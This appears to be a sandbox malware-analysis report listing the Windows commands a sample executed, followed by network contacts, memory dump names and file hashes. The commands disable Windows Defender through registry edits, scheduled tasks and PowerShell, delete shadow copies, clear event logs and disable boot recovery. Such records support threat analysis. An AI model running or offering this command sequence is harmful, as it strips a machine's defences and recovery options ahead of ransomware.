C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_13373" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.8.19:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 40.119.148.38:123 time.windows.com udp

Files

memory/2776-118-0x0000000000000000-mapping.dmp

memory/3152-119-0x0000000000000000-mapping.dmp

memory/3688-120-0x0000000000000000-mapping.dmp

memory/1336-121-0x0000000000000000-mapping.dmp

memory/1208-122-0x0000000000000000-mapping.dmp

memory/932-123-0x0000000000000000-mapping.dmp

memory/2004-124-0x0000000000000000-mapping.dmp

memory/3164-125-0x0000000000000000-mapping.dmp

memory/652-126-0x0000000000000000-mapping.dmp

memory/3972-127-0x0000000000000000-mapping.dmp

memory/4012-128-0x0000000000000000-mapping.dmp

memory/3604-129-0x0000000000000000-mapping.dmp

memory/4004-130-0x0000000000000000-mapping.dmp

memory/1480-131-0x0000000000000000-mapping.dmp

memory/2832-132-0x0000000000000000-mapping.dmp

memory/212-133-0x0000000000000000-mapping.dmp

memory/3500-134-0x0000000000000000-mapping.dmp

memory/668-135-0x0000000000000000-mapping.dmp

memory/692-136-0x0000000000000000-mapping.dmp

memory/1436-137-0x0000000000000000-mapping.dmp

memory/896-138-0x0000000000000000-mapping.dmp

memory/2960-139-0x0000000000000000-mapping.dmp

memory/340-140-0x0000000000000000-mapping.dmp

memory/2012-141-0x0000000000000000-mapping.dmp

memory/2932-142-0x0000000000000000-mapping.dmp

memory/1488-143-0x0000000000000000-mapping.dmp

memory/2060-144-0x0000000000000000-mapping.dmp

memory/1800-145-0x0000000000000000-mapping.dmp

memory/3040-146-0x0000000000000000-mapping.dmp

memory/2132-147-0x0000000000000000-mapping.dmp

memory/3248-148-0x0000000000000000-mapping.dmp

memory/2920-149-0x0000000000000000-mapping.dmp

memory/3808-150-0x0000000000000000-mapping.dmp

memory/684-151-0x0000000000000000-mapping.dmp

memory/3644-152-0x0000000000000000-mapping.dmp

memory/3664-153-0x0000000000000000-mapping.dmp

memory/3076-154-0x0000000000000000-mapping.dmp

memory/1252-155-0x0000000000000000-mapping.dmp

memory/2144-156-0x0000000000000000-mapping.dmp

memory/3152-157-0x0000000000000000-mapping.dmp

memory/1212-158-0x0000000000000000-mapping.dmp

memory/640-159-0x0000000000000000-mapping.dmp

memory/368-160-0x0000000000000000-mapping.dmp

memory/420-161-0x0000000000000000-mapping.dmp

memory/3948-162-0x0000000000000000-mapping.dmp

memory/3744-163-0x0000000000000000-mapping.dmp

memory/3728-164-0x0000000000000000-mapping.dmp

memory/1420-165-0x0000000000000000-mapping.dmp

memory/216-166-0x0000000000000000-mapping.dmp

memory/596-167-0x0000000000000000-mapping.dmp

memory/2976-168-0x0000000000000000-mapping.dmp

memory/3036-169-0x0000000000000000-mapping.dmp

memory/1380-170-0x0000000000000000-mapping.dmp

memory/3504-171-0x0000000000000000-mapping.dmp

memory/2284-172-0x0000000000000000-mapping.dmp

memory/3044-173-0x0000000000000000-mapping.dmp

memory/1776-174-0x0000000000000000-mapping.dmp

memory/1032-175-0x0000000000000000-mapping.dmp

memory/2160-176-0x0000000000000000-mapping.dmp

memory/1748-177-0x0000000000000000-mapping.dmp

memory/3528-178-0x0000000000000000-mapping.dmp

memory/3676-179-0x0000000000000000-mapping.dmp

memory/3712-180-0x0000000000000000-mapping.dmp

memory/2256-181-0x0000000000000000-mapping.dmp

memory/1068-182-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-183-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-184-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-185-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-186-0x000002249B4C0000-0x000002249B4E2000-memory.dmp

memory/1068-187-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-188-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-189-0x000002249B9A0000-0x000002249BA16000-memory.dmp

memory/1068-190-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/1068-195-0x000002249B483000-0x000002249B485000-memory.dmp

memory/1068-194-0x000002249B480000-0x000002249B482000-memory.dmp

memory/1068-196-0x000002249B486000-0x000002249B488000-memory.dmp

memory/1068-217-0x00000224814D0000-0x00000224814D2000-memory.dmp

memory/3368-219-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

memory/3368-220-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

memory/3368-221-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

memory/3368-222-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

memory/3368-223-0x000001D98C890000-0x000001D98C8B2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 659e84e92d8fe213d32e0a9ce468d81d
SHA1 06f40e72ef5c8bee8904d7bf6fd03fe892817fe9
SHA256 6d06ee5f7f9540d181b654fd43e0233b5befa323d43d75663379deeb6644b6f3
SHA512 b45f840331bf4c6bbcb0284a2e33735fb94f86675b53237bab789620e8ab7fa19664cdf9b245a1cd1a6860ad1f924e0c0824222e3047356a0dc00e02ef925a2c

memory/3368-225-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

memory/3368-227-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

memory/1068-226-0x000002249B488000-0x000002249B489000-memory.dmp

memory/3368-228-0x000001D98C8C0000-0x000001D98C8C2000-memory.dmp

memory/3368-229-0x000001D98C8C3000-0x000001D98C8C5000-memory.dmp

memory/3368-230-0x000001D9A5080000-0x000001D9A50F6000-memory.dmp

memory/3368-231-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp

memory/3368-255-0x000001D98C8C6000-0x000001D98C8C8000-memory.dmp

memory/3368-256-0x000001D98C8C8000-0x000001D98C8C9000-memory.dmp

memory/3368-257-0x000001D98C5A0000-0x000001D98C5A2000-memory.dmp